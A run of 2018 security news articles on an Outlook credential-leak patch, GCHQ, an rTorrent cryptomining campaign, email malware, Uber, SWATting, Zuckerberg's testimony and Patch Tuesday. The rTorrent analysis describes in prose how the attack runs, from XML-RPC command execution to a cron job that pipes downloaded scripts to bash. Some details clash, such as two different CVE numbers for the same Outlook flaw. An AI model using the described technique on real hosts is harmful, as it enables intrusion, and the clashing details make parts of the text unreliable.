STE WILLIAMS

Microsoft emitted a patch for all supported versions of Outlook on Patch Tuesday this month to prevent attackers harvesting credentials from users who simply preview a carefully crafted Rich Text (RTF) email.

The vulnerability (CVE-2018-0950) exploited Outlook’s unfortunate habit of retrieving remotely hosted Object Linking and Embedding (OLE) content when previewing a RTF email.

The Windows client was able to authenticate itself if that content was hosted on SMB/CIFS server.

If the SMB server was controlled by the attacker, then Windows had effectively handed over the user’s login credentials, including a hashed password, without any interaction on behalf of the user other than the email being rendered.

And let’s face it, most users generally are unlikely to have a particularly strong password, meaning that cracking the hash would not have presented a problem for a determined attacker.

Microsoft’s OLE technology was surely the gift that keeps on giving as far as hackers are concerned.

Will Dormann of CERT reported the issue on 29 November 2016 (yes, 2016) and it has taken Microsoft 18 months to deal with it.

Unfortunately, the fix didn’t entirely solve the problem. While it did stop Outlook from kicking off a SMB connection during preview, it would not avoid the scenario of a user clicking on a link in the email itself. Such carefree clicking sees the same potential impact as the original vulnerability.

To solve the issue in the absence of a more complete fix, Dormann recommended installing the patch (obviously) and then stopping inbound and outbound SMB connections at the network border by blocking ports 445/tcp, 137/tcp, 139/tcp, as well as 137/udp and 139/udp.

Dormann also suggested blocking NTLM SSO authentication. To be fair, Microsoft issued an advisory on this very thing in November 2017.

Dormann concluded with some common-sense security advice: “Assume that at some point your client system will attempt to make an SMB connection to an attacker’s server. For this reason, make sure that any Windows login has a sufficiently complex password so that it is resistant to cracking”

He went on to recommend using a password manager to deal with all those symbols and numbers we should all be using in hard-to-crack and easy-to-forget passwords. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/04/12/outlook_patch_preview_bug/

GCHQ‬ boss Jeremy Fleming has hailed the success of a cyber-offensive against ISIS last year and warned of the growing threat posed by Russia.

During a wide-ranging speech at the CyberUK conference in Manchester on Thursday morning, Fleming said a cyber operation last year had disrupted ISIS’s [Daesh] communications.

In 2017 there were times when Daesh found it almost impossible to spread their hate online, to use their normal channels to spread their rhetoric, or trust their publications

“GCHQ, in partnership with the Ministry of Defence, has conducted a major offensive cyber campaign against Daesh,” Fleming said.

“These operations have made a significant contribution to coalition efforts to suppress Daesh propaganda, hindered their ability to coordinate attacks, and protected coalition forces on the battlefield.”

“In 2017 there were times when Daesh found it almost impossible to spread their hate online, to use their normal channels to spread their rhetoric, or trust their publications,” he added.

Fleming said cyber is only one part of the wider international response, adding this is the “first time the UK has systematically and persistently degraded an adversary’s online efforts as part of a wider military campaign”.

Fleming hinted similar tactics, now proven, might be used against other (unnamed) potential aggressors. “It worked against Daesh and it can work against other national security challenges too,” he said.

Options go beyond simple denial of service onto operations that “perhaps even destroy equipment or networks” but this would only be done in accordance with international law and proportionate to threats posed, he said. Fleming made no mention of using signals intelligence to direct drone strikes by tracking terrorist’s phones, tactics which were previously reported to have been used in operations against high profile jihadis.

During his first public speech, the GCHQ director also spoke at length about the heightened threat posed by an “old foe”, Russia.

The Kremlin is “blurring the boundaries between criminal and state activity” and not playing by international norms, Fleming told delegates. This goes beyond the nerve agent attack against Sergei Skripal and his daughter in Salisbury, blamed by UK authorise against Russia, that has resulted in a diplomatic crisis and the worsening of Anglo-Soviet relations.

“Whether that’s NotPetya against the Ukraine’s financial, energy and government sectors, which eventually spread across the world, or the use of industrial scale disinformation to sway public opinion – they’re not playing to the same rules,” he said.

The UK has collected evidence on Russia for around two decades, monitoring a growing cyber threat, said Fleming. GCHQ’s expertise is likely to be in increasing demand, he added.

Earlier this week GCHQ announced plans to open a new GCHQ site in Manchester, creating hundreds of jobs in the process. The new site, to be opened next year, will work with GCHQ’s main base in Cheltenham and existing satellite offices in Bude, Cornwall and Scarborough, Yorkshire in delivering on GCHQ’s overall mission.

“Criminals and hostile states are ‘early adopters’ of tech so the authorities must combat that threat to maintain a ‘safer digital Britain’,” Fleming said.

“Hostile states, terrorists and criminals are emboldened and assisted by technology. They’re early adopters of new products and services, investing heavily in strategies and tactics to further their causes.”

Recruitment is a key challenge and GCHQ is developing a strategy to manage the cyber skills gap.

“We need to offer more flexible careers, where individuals can more easily work at lower levels of classification, can pursue their interests in the private sector and can bring the best of that back into GCHQ,” Fleming claimed.

“This means changing the perception of a career in the intelligence community so that more men and women from every part of society can imagine themselves thriving in the intelligence and security world.

“Yes, for some of our roles we’ll continue to need those with a Doctorate in Mathematics or Computer Science, but we also need people straight from school or those who want a career change. People who can lead and make decisions,” he concluded.

Bootnote

During his speech Fleming made no mention of cryptography aside from a single reference to cryptocurrencies in the context of ransomware. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/04/12/gchq_boss_cyberuk/

What’s This?

As cryptomining campaigns become more profitable, cybercriminals are becoming more creative about finding new ways to extend their operations.

rTorrent is a Unix-based torrent client that is implemented in C++. rTorrent optionally supports XML-RPC to allow control by other external programs. XML-RPC is a remote procedure call (RPC) protocol that uses XML to encode its calls and HTTP as a transport mechanism. ruTorrent is an example of a web-based front-end that controls the rTorrent client using XML-RPC communication.

Unlike communicating with the uTorrent client, the rTorrent client doesn’t require any authentication and supports a method for direct shell command execution. While this functionality was not meant to be publicly accessible, some threat actors decided to test their luck on the Internet by looking for misconfigured rTorrent clients exposed to the web.

The campaign spotted by F5 researchers consists of two steps: reconnaissance and exploitation. The reconnaissance is performed using POST requests to an XML-RPC endpoint. The attacker tries to invoke the “download_list” method (provides the list of downloaded torrents) as an indication of an installed rTorrent client.

The request is sent to the “/RPC2” URL (as would be the case for common XML-RPC communication) but the endpoint URL is defined by the torrent client user in the web server configuration and could be configured to other values.

If there is a running rTorrent instance, it responds with a “200 OK” status code, and a list of hashes of the download list files. Then, once the result is positive, the attacker initiates the exploitation by sending another POST request that calls the “execute” method, which allows the attacker to run arbitrary shell commands on the host.

Payload Analysis
The attacker executes the bash (Unix shell) command with a base64 encoded payload. The payload is decoded using a Unix built-in base64 command and is executed by piping it to another bash to create a crontab task executed every hour. The task downloads a file from the attacker’s server and pipes its content directly to bash, which results in the execution of the script without saving it on the hard drive.

The bash script sets up some environment variables and prevents logging of any output from the running script. It also changes the memory page’s size to 128, likely to increase the performance of the mining process.

Removing Competitors
The script tries to stop other miners from running (competitors or older versions of its own miners) if they are present. It has quite a comprehensive list of miner process identifiers, from common miner program names like “miner” and “xmr” to specific file names such as “wnTKYg”, “imWBR” and “ddg”, that are related to another mining campaign. It also searches for common miner program arguments such as“stratum”(mining protocol) and miners that pretend to be ssh deamon (for example, sshd).

Downloading Malware from the Hidden Network
The malware sleeps for random periods (likely an evasion technique) and then downloads the mining malware with the correct OS architecture (x64 or x32). Interestingly, the file is served from a Tor network using the Tor2Web “gateway” service to make detection and shutdown of the attacker’s website more difficult. Tor2Web allows Tor hidden services to be accessed from a standard browser without being connected to the Tor network. This technique has been used by attackers for several years.

Zealot Connection?
Looking more closely, the malware download request contain a custom user-agent header with the value of “-“. Interestingly, the same unique user-agent was also used in the Zealot campaign, leading us to speculate that both campaigns are executed by the same threat actor.

The user-agent is a bit unique as attackers typically use a legitimate browser user-agent to better masquerade their traffic, or a user agent that includes a default HTTP library name (for example, “python-requests/2.18.4”). In this case, the user-agent doubles as a deception technique to trick researchers or scanners that access the server with their Internet browser or tool and get a “403 Forbidden” response instead of the real content. This technique is being used more frequently by sophisticated attackers nowadays.

The downloaded malware is a Monero (XMR) crypto-currency miner. Currently, the executable is barely detected by anti-virus agents.  At the time of this writing, only 3 of 59 anti-virus agents detected it as malicious.

Mining Monero (XMR) Currency
The mining pool and Monero wallet addresses is in the malware file strings.

The mining addresses are: 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h

44Sqc2Zcgz7ROLQcGRXtFsMbwNQIX5HExWMxD9tfxXRDBBiu2pf2j6VhvjD6i7D8MLNYzn73efgxEIwfweVG626MIdl2uxC

Looking at the mining addresses we can see that the attacker has gained approximately $3,900 from this campaign for one of the addresses. The attacker’s current hash rate will produce the attacker about $43 per day. Currently, the second address doesn’t have a balance.

As crypto-mining campaigns become more profitable than other cybercrime business models, attackers are becoming more creative and finding new ways to extend their operations. In this example, we are seeing crypto criminals moving into an interesting attack vector target: misconfigured BitTorrent clients. As a protection, rTorrent users are advised to make sure that their clients are not accepting connections from the outside world, and that the listening sockets are bound to the localhost. Or, better yet, avoid XML-RPC functionality that is not shipped with the default installation. It’s worth noting that the author of rTorrent explicitly recommends not using the RPC functionality over TCP sockets.

Get the latest application threat intelligence from F5 Labs.

F5 makes apps go-faster, smarter, and safer. With solutions for the cloud and the data center, F5 technology provides unparalleled visibility and control, allowing customers to secure their users, applications, and data. For more information, visit www.f5.com. View Full Bio

Article source: https://www.darkreading.com/partner-perspectives/f5/how-attackers-can-exploit-rtorrent-with-monero-cryptocurrency-miner/a/d-id/1331422?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

A new attack dropping the Quant Loader Trojan bypasses scanners and sandboxes.

When it comes to malware, email still reigns supreme as the delivery mechanism of choice. The reasoning is simple: It’s cheap, it’s easily spoofed, and recipients are accustomed to getting messages from various sources. That means when a new attack is found, there’s a good possibility that it will spread successfully.

Researchers at Barracuda Networks found, through analyzing attacks on its customer network, a new Quant Loader Trojan campaign using Samba shares as a mechanism – rather than the more common http:// protocol. The result could be a new wave of ransomware attempts, a new round of keystroke loggers, or worse.

The new campaign has similarities to the FlawedAmmyy RAT campaign identified by Proofpoint several weeks ago. In both campaigns, the file:// URL prefix is used to trigger a file download via either SMB protocol or Samba. According to Fleming Shi, senior vice president of advanced technology at Barracuda, this mechanism has several benefits to the attacker when compared to traditional Web downloads.

First, because the URL is malformed and doesn’t involve the http:// prefix, it isn’t flagged by many defense systems as malicious. “So when they actually analyzed the file, analyzed the behavior, they found it not malicious because the URL was not active,” Shi says. “At a later date they’ll activate the URL, do the secondary download, and launch the attack.”

Quant Loader itself is a Trojan that can be used to distribute a variety of malware payloads, including ransomware and password stealers. It is sold on underground forums and allows the user to configure the payload(s) upon infection using a management panel.

Stephen Boyer, CTO and co-founder of Bitsight, says that it’s no wonder that criminals are still using email as a primary attack vector for malware. “I can send you a message without any previous relationship, or knowledge, or authentication scheme,” he says. “So that’s that’s why it’s been so effective.”

In spite of the potential danger, email is still the most critical messaging form used by business, so there’s no real option that includes simply not looking at, opening, or responding to email.

This latest campaign has not limited itself to a single malware payload, Shi says, so it can’t be assumed to all be from a single source. In addition, he says there’s a characteristic of this campaign that made it especially interesting to researchers.

“We believe the sophistication in this is the ability to alter the packaging at a pretty rapid pace,” Shi says. “And also, this wasn’t just one day and they went away – they actually kept going.”

He says he and his team saw the campaign repeated over more than three weeks, with evidence of its evolution within that timeframe.

Unlike some recent malware outbreaks that have been geographically targeted, Shi says that this latest campaign has had targets all over the UK and North America. The one constant, he says, is English used as the language in the email, though that could easily be changed in future attacks.

Related Content:

• Verizon DBIR: Ransomware Attacks Double for Second Year in a Row
• Increasingly Aggressive Malware Drives IT Pros to Re-Examine Backup Strategies, Solutions
• Misconfigured Clouds Compromise 424% More Records in 2017
• Microsoft Patches Critical Flaw in Malware Protection Engine

Join Dark Reading LIVE for an intensive Security Pro Summit at Interop IT X and learn from the industry’s most knowledgeable IT security experts. Check out the agenda here.Register with Promo Code DR200 and save $200.

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/new-email-campaign-employs-malicious-urls/d/d-id/1331521?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

A deep dive into how organizations can effectively devise and implement microsegmentation in a software-defined networking data center.

Network segmentation is a best-practice strategy for reducing the attack surface of data center networks. Just as the watertight compartments in a ship should contain flooding if the hull is breached, segmentation isolates servers and systems into separate zones to contain intruders or malware, limiting the potential security risks and damage.

A lack of effective network segmentation has been cited as a contributing factor behind several major data breaches, from the 2013 attack on Target to the recent Equifax breach. But while segmentation enhances an organization’s security posture, it also adds complexity and costs — especially in traditional on-premises data centers.

In these hardware-based environments, creating internal zones usually means installing extra firewall appliances to police the traffic flows between zones, which is expensive and time consuming. As a result, segmentation in traditional data centers has usually been limited to creating only a handful of zones.

Microsegmentation Momentum
More recently, the move to virtualized data centers using software-defined networking (SDN) is driving adoption of internal network segmentation. SDN’s flexibility enables advanced, granular zoning where data center networks are divided into hundreds or thousands of microsegments. This offers levels of security that were previously prohibitively expensive and complicated to implement. It’s no surprise that ESG analyst Jon Oltsik last year reported that 68% of enterprises are using some form of software-based microsegmentation technology to limit lateral exploration of networks by hackers, and make it easier to protect their applications and data.

But while SDN makes segmentation far easier to achieve, implementing an effective microsegmentation strategy presents two key challenges: where to place the borders between the microsegments in the data center; and how to devise and manage the security policies for each of the segments in their network environment?

Network and application traffic in the data center will need to cross multiple segments’ security controls to enable the application to function. So, the policies at each control must allow this traffic or the application simply will not work. And the more segments a network has, the more complex these policies become if they are to be effective in supporting business applications while blocking illegitimate traffic.

Starting the Microsegmentation Process
These challenges can be addressed with the right approach. The starting point is to discover all the application flows within your data center. An efficient way of doing this is by using a discovery engine that can identify and group together those flows that have a logical connection to each other — such as those based on shared IP addresses, which indicates the flows that may support the same business application.

This information can be augmented with additional data, such as labels for device or application names that are relevant to the flows. This creates a complete map that identifies the flows, servers, and security devices within the data center that your business applications rely on to function correctly.

Setting Up Segment Borders
Using this map, you can create your segmentation scheme for deciding which servers and systems should be placed in which network segment. This is done by identifying and grouping together servers that support the same business intent or applications. These servers are likely to be in regular communication with each other — typically sharing similar data flows — and can be placed within the same segment to better facilitate their interaction.

Once the scheme is outlined, you can then choose the best places on the data center network to place the security filters (such as virtual firewalls or other security controls) and create secure borders between segments.

When placing the filtering device (or activate a virtualized microsegmentation technology) to create a border between segments, remember that some of your application traffic flows will need to cross that border. Those cross-border flows will need explicit policy rules to allow them, otherwise the flows will be blocked and the applications that rely on them will fail. Therefore, you need to establish exactly what will happen to the flows once those filters are introduced.

Policing the Borders
To establish if you need to add or change specific policy rules, and what those rules should be, examine the application flows that were identified in your initial discovery process, noting if a flow already passes through an existing security control. If a given application flow does not currently pass through any security control and you plan to create a new network segment, you need to know if the unfiltered flow might get blocked when that segment border is established. If it does get blocked by the new border, you will need to add a new, explicit policy rule in order to allow the application flow to cross it.

However, if a given flow is already being filtered by a security control, then there is usually no need to add another explicit rule for that flow when you start to segment your network. This process can be repeated until you’re satisfied that you have segmented your network to deliver the levels of separation and security that you need.

Managing Holistically
Having deployed your microsegmentation scheme, your next step is to make sure that it works in harmony with the security across your network. Application traffic needs to flow seamlessly across your SDN, in on-premises and cloud environments, so it’s critical to confirm that your policies support this.

The most effective way to achieve this is with an automation solution that can holistically manage all the security controls in your SDN environment alongside your existing traditional on-premises firewalls. This will ensure that the security policies that underpin your segmentation strategy are consistently applied and managed across your entire network estate as well as centrally monitored, with any changes tracked for audit purposes.

Implementing microsegmentation requires careful planning and orchestration if it’s to be effective. But when done properly, microsegmentation delivers both a stronger security posture and greater business agility. Sometimes, good things really do come in small packages.

Editor’s note: Generic products referred to in this article are available from multiple vendors in the security industry.

Related Content:

• Avoiding Micro-Segmentation Pitfalls: A Phased Approach to Implementation
• Segmentation: The Neglected (Yet Essential) Control
• Encrypted Attacks Continue to Dog Perimeter Defenses

Join Dark Reading LIVE for an intensive Security Pro Summit at Interop IT X and learn from the industry’s most knowledgeable IT security experts. Check out the agenda here. Register with Promo Code DR200 and save $200.

Avishai Wool co-founded AlgoSec in 2004 and has served as its CTO since its inception. Prior to co-founding AlgoSec, he co-founded Lumeta Corporation in 2000 as a spin-out of Bell Labs, and was its Chief Scientist until 2002. At Lumeta, Dr. Wool was responsible for … View Full Bio

Article source: https://www.darkreading.com/perimeter/microsegmentation-strong-security-in-small-packages/a/d-id/1331434?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Web site security firm SiteLock has been acquired by venture fund managers ANRY Partners.

SiteLock, a website security company, announced today that it has been acquired by private equity firm ABRY Partners, which takes over from Unitedweb as the principal equity holder. Financial terms of the deal were not disclosed.

The suite of products and services provided by SiteLock include protection against malware, software vulnerabilities, and DDoS attacks, as well as PCI compliance support and content delivery networks.

Arizona-based SiteLock says that it protects more than 12 million websites globally. ABRY Partners currently manages over $5.0 billion of capital in their active funds.

For more, read here and here.

Join Dark Reading LIVE for an intensive Security Pro Summit at Interop IT X and learn from the industry’s most knowledgeable IT security experts. Check out the agenda here.Register with Promo Code DR200 and save $200.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/application-security/abry-partners-buys-sitelock/d/d-id/1331524?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Uber has agreed to an updated settlement with the FTC after news of its massive 2016 data breach.

Uber has agreed to an expanded settlement with the Federal Trade Commission, which last year charged the ride-sharing company for deceiving customers with its privacy and data security practices. The new settlement takes into account Uber’s massive 2016 data breach.

In the original settlement, proposed in August 2017, the FTC reported Uber failed to live up to claims that it closely monitored employees’ access to rider and driver data, and that it implemented measures to secure personal data on third-party cloud servers.

The FTC later learned Uber had failed to disclose a significant breach of user data that occurred in 2016 while it was investigating this settlement. As a result, it has updated its complaint to note that Uber knew about the 2016 breach and paid the attackers $100,000 through a “bug bounty program” to keep quiet. The breach was disclosed a year after it occurred, in Nov. 2017.

In the new agreement, Uber is compelled to disclose future incidents involving consumer data and submit all reports from required third-party audits of its privacy program. It must retain certain records related to bug bounty reports of flaws that could compromise users’ data. Uber could be subject to civil penalties if fails to share future incidents with the FTC.

Read more details here.

Join Dark Reading LIVE for two cybersecurity summits at Interop ITX. Learn from the industry’s most knowledgeable IT security experts. Check out the security track here. Register with Promo Code DR200 and save $200.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/uber-agrees-to-new-ftc-settlement-over-2016-breach-disclosure/d/d-id/1331525?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

A few things you might not want to do next time you’re in jail for an alleged SWATting that got a man killed: tweet that you’re an eGod …

…and threaten to SWAT someone’s ass.

The tweets came from the account of Tyler Barriss. The 25-year-old Los Angeles man is in a Kansas jail, awaiting trial over allegedly making a bogus emergency call that led to the fatal police shooting of 28-year-old Andrew Finch in Wichita, Kansas on 28 December.

Barriss is facing a charge of involuntary manslaughter.

He allegedly made the call after a Call of Duty game in which two teammates were disputing a $1.50 wager. Apparently, one had accidentally “killed” a teammate in the first-person shooter game.

One of the players sent incorrect details of a nearby address to a known swatter, who was reportedly responsible for evacuations over a bomb hoax call at the Call of Duty World League Dallas Open in December.

After his arrest, Barriss said he felt “a little” remorse.

Of course, you know, I feel a little of remorse for what happened. I never intended for anyone to get shot and killed. I don’t think during any attempted swatting anyone’s intentions are for someone to get shot and killed. I guess they’re just going for that shock factor whatever it is, for whatever reason someone’s attempting swat, or whatever you want to call it.

Yes, I think we can definitely call what happened a SWAT. SWATting, which takes its name from elite law enforcement units called SWAT (Special Weapons and Tactics) teams, is the practice of making a false report to emergency services about shootings, bomb threats, hostage taking, or other alleged violent crime in the hopes that law enforcement will respond to a targeted address with deadly force.

In the recording of the emergency call that cost Finch his life, a man said he’d shot his father in the head. The caller also said he was holding his mother and a sibling at gunpoint in a closet. He said he’d poured gasoline all over the house and that he was thinking of lighting the house on fire.

Police surrounded Finch’s Wichita home, prepared to deal with a hostage situation. When Finch answered the door, he followed police instructions to put up his hands and move slowly. But at some point, authorities said, Finch appeared to be moving his hand toward his waistband as if he was going to pull out a gun.

A single shot killed Finch. He was dead by the time he reached the hospital. Police said the innocent man was unarmed.

Barriss might have expressed some kind of lukewarm remorse when he was arrested, but unless his Twitter account was hijacked at precisely the right time, it sounds like he has no qualms about referring to this potentially lethal hobby. The Twitter handle used to post the messages, @GoredTutor36, has previously been associated with Barriss.

So if he’s not an “eGod,” how did Barriss apparently get online?

A local paper, the Wichita Eagle, reports that there was a glitch during a software upgrade to an inmate kiosk that gave inmates internet access. Inmates use jail kiosks to check their account balances in order to buy items from the jail’s commissary and to send and receive messages. Beyond that, they’re not allowed to have access to the internet.

The Sedgwick County Sheriff’s Office on Monday said in a news release that the upgrade glitch gave inmates a chance to get onto the internet “for less than a few hours.”

Four tweets had gone out from Barriss’s account on Friday. One bragged about how much “swag” he had in jail.

The Sheriff’s Office said that the problem affected jail kiosks across the country, but it’s now fixed:

As soon as the path was identified it was closed and the affected kiosk was upgraded with the proper digital security features. [The kiosk that was upgraded improperly] has been tested and the issue did not reoccur.

Follow @LisaVaas
Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/xv7S5xP5BdM/

After Tuesday’s nearly five-hour grilling in the Senate – more of a light sautéing, really – Facebook CEO Mark Zuckerberg on Wednesday gave Congress another five hours of his life: this time, before the House Energy and Commerce Committee.

Representatives’ questions again hit on Tuesday’s themes: data privacy and the Cambridge Analytica (CA) data-scraping fiasco, election security, Facebook’s role in society, censorship of conservative voices, regulation, Facebook’s impenetrable privacy policy, racial discrimination in housing ads, and what the heck Facebook is: a media company (it pays for content creation)? A financial institution (think about people paying each other with Facebook’s Venmo)?

Zuck’s take on what Facebook has evolved into: “I consider Facebook a technology company. The main thing we do is write code. We do pay to help produce content. We also build planes to help connect people, but I don’t consider ourselves to be an aerospace company.” (Think of Facebook’s flying ISPs.)

When he hears people ask whether Facebook is a media company, the CEO said that what he really hears is whether the company has, or should have, responsibility over published content – be it fake news meant to sway elections, hate speech, or Russian bots doing bot badness.

His answer has evolved: for years, he’s been pushing back against fears about fake news on Facebook. The company just builds the tools and then steps back, he’s repeatedly said, insisting that platform doesn’t bear any of the responsibilities of a publisher for verifying information.

Zuck still considers Facebook to primarily be a technology company, but for two days of testimony he’s acknowledged that it’s been slow to accept responsibility when people do bad things with its tools.

Overall, the tone of the questioning was a lot tougher than it was in the Senate. Zuckerberg didn’t budge from his script, though.

For example, Rep. Frank Pallone tried to nail Zuck down on making a commitment to changing all user default settings so as to minimize, “to the greatest extent possible,” the collection and use of data. One-word answer, please: yes or no?

Zuck demurred: “That’s a complex issue,” he said. “and it deserves more than a one-word answer.”

Pallone came back with a zinger having to do with how Facebook has passed the buck when it comes to protecting users’ data from being scraped and used to do things like target voters with political ads:

You said yesterday that each of us owns the data we put on Facebook. Every user is in control. But we know the problems with CA. How can Facebook users have control over their data when Facebook itself doesn’t?

OUCH! Yea, what he said!

Zuck’s I-Am-Teflon response: “We have the ability for people to sign into apps and bring their data with them.” That means you can have, for example, a calendar that shows friends’ birthdays, or a map that shows friends’ addresses. But to do that, you need access to your friends’ data as well as bringing in your own to an app. Facebook has now limited such app access so that people can only bring in their own data, he said.

OK… but that’s not really an answer. Of course, during his two days of testimony, Zuckerberg repeatedly explained that users have control over everything they post. There’s that little drop down, Zuckerberg explained many, many times, that lets you choose who’s going to view your content – the public at large? Just friends? Groups? Just one or two people? It’s up to you!

True, privacy policies are tough to read, and that’s why Facebook tries to stick privacy into the stream of things. Like, say, those little drop-down arrows allowing you to choose who sees what… and did he mention those little drop-down arrows that let you choose the audience for a post? Maybe once or twice.

And yes, Zuck said, Facebook is working on making it easier for users to get to privacy settings. For example, after CA blew up last month, Facebook pledged to reach into the 20 or so dusty corners where it’s tucked away privacy and security settings and pull them into a centralized spot for users to more easily find and edit whatever data it’s got on them.

Assorted other bees in the House’s bonnet included:

Diamond and Silk. Diamond and Silk. Diamond and Silk.

What in the world is this “Diamond and Silk” that conservative lawmakers have repeatedly asked about during the two days of Zuck’s testimony? For those of us who aren’t familiar, it’s not a luxury brand: they’re two pro-Trump vloggers, Lynnette “Diamond” Hardaway and Rochelle “Silk” Richardson, who’ve claimed that Facebook has censored them as spreading “unsafe” content.

On Wednesday, Rep. Joe Barton started his questioning by reading a request he got from a constituent: “Please ask Mr. Zuckerberg, why is Facebook censoring conservative voices?” He said he’d received “dozens” of similar queries through Facebook.

Zuckerberg: “Congressman, in that specific case, our team made an enforcement error and we have already gotten in touch with them to reverse it.”

Sen. Ted Cruz also brought up the vloggers during a heated exchange with Zuckerberg on Tuesday, citing them as an example of what he said is Facebook’s “pattern of bias and political censorship.”

Diamond and Silk were also brought up by Rep. Fred Upton and Rep. Marsha Blackburn, the latter of whom also asked if Facebook “subjectively manipulate[s] algorithms to prioritize or censor speech?”

When Zuck began his response by referencing hate speech and terrorist material – “the types of content we all agree we don’t want on the service” and which are automatically identified and banned from the platform – Blackburn angrily interrupted him, exclaiming:

Let me tell you something right now. Diamond and Silk is not terrorism!

What’s the difference between Facebook and J. Edgar Hoover?

Over the course of two days, both branches of Congress wondered whether Facebook is a surveillance outfit. Does it listen to our conversations? One seed of that worry was planted when many users, post-CA, requested their data archives from Facebook, only to find that the platform logs calls and texts… with permission, Facebook stressed and which apparently went in many ears and right back out.

Rep. Bobby Rush asked Zuckerberg what the difference is between Facebook and a 1960s program wherein the government, through the FBI and local police, conducted a counterintelligence program to track and share information about civil rights activists, including their religious and political ideology. He himself was a “personal victim” of the program.

“Your organization is similar,” Rush said. “You’re truncating basic rights … including the right to privacy. What’s the difference between Facebook’s methodology and the methodology of American political pariah J. Edgar Hoover?”

Zuck said the difference between surveillance and what Facebook does is that on Facebook, you have control over your information. “You put it there. You can take it down anytime. I know of no surveillance organization that gives people that option.”

Mark, you’ve had a tough few days. I hate to make your week even more arduous.

But puh-LEEEZ. Come on. Everybody knows that Facebook tracks us across the web, even when we leave the platform. It’s been doing it for years.

One tool among many to do so is Facebook Pixel, a tiny, transparent image file the size of just one of the millions of pixels on a typical computer screen. No user would ever notice the microscopic snippet, but requests sent by web pages to get one are packed with information.

No, we don’t have that much control over our information. But Mark Zuckerberg has demonstrated masterful control when it comes to staying on message.

Follow @LisaVaas
Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/c3sJIBGCPXk/

With the Windows 10 1803 Spring Creators Update delayed at the eleventh hour for unknown reasons, admins and end users still have plenty of work on their hands with April’s Patch Tuesday.

The big picture is 65 security fixes assigned CVE numbers, 23 of which (plus a separate Adobe Flash flaw) are rated critical, with no true zero-days among them.

An urgent 66^th CVE on the list should already have been fixed a week ago through an emergency patch that Microsoft issued for a critical vulnerability (CVE-2018-0986) in the Microsoft Malware Protection Engine (MMPE).

Affecting Security Essentials, Intune Endpoint Protection, Windows Defender, Exchange Server 2013/2016, and Forefront Endpoint Protection 2010, this patch should have been applied automatically via MMPE itself.

A breakdown of the remaining 22 critical flaws shows:

• Seven memory corruption vulnerabilities in the Chakra Scripting Engine (Edge’s JavaScript interpreter).
• Five remote code execution (RCE) flaws in Microsoft Graphics’ Windows font library.
• Four affecting Internet Explorer
• Four affecting the scripting engine also used by Internet Explorer.
• One affecting Windows 10’s Edge browser.
• One RCE in the Windows VBScript engine.

The five font-themed flaws attracted warnings from experts, including Dustin Childs of vulnerability research company Zero Day Initiative:

Since there are many ways to view fonts – web browsing, documents, attachments – it’s a broad attack surface and attractive to attackers.

A final interesting flaw is CVE-2018-0850, rated “Important” and affecting Microsoft Outlook.

Reported by US CERT CC’s Will Dormann way back in November 2016, the update patches this but not entirely, he said:

This update prevents automatic retrieval of remote OLE objects in Microsoft Outlook when rich text email messages are previewed. If a user clicks on an SMB link, however, this behavior will still cause a password hash to be leaked.

Spectre chip flaws

In parallel news, AMD has issued a Windows microcode update addressing the Spectre variant 2 chip flaw (CVE-2017-5715) that Naked Security covered last week in relation to older Intel microprocessors.

For Windows 10 users, this works in tandem with a Microsoft update (look for “April 2018 Windows OS updates”), installed in conjunction with each PC manufacturer’s BIOS updates. Linux mitigations were released earlier in 2018, AMD said.

TL;DR: in the four words of Naked Security’s security update mantra: patch early, patch often.

Note. The Microsoft Knowledge Base (KB) update number you see depends on your Windows version and build number. The latest Windows 10 build is 16299.371 (1709), for which the update appears as KB4093112.

Follow @JohnEDunn
Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/BQlJiLPJPB8/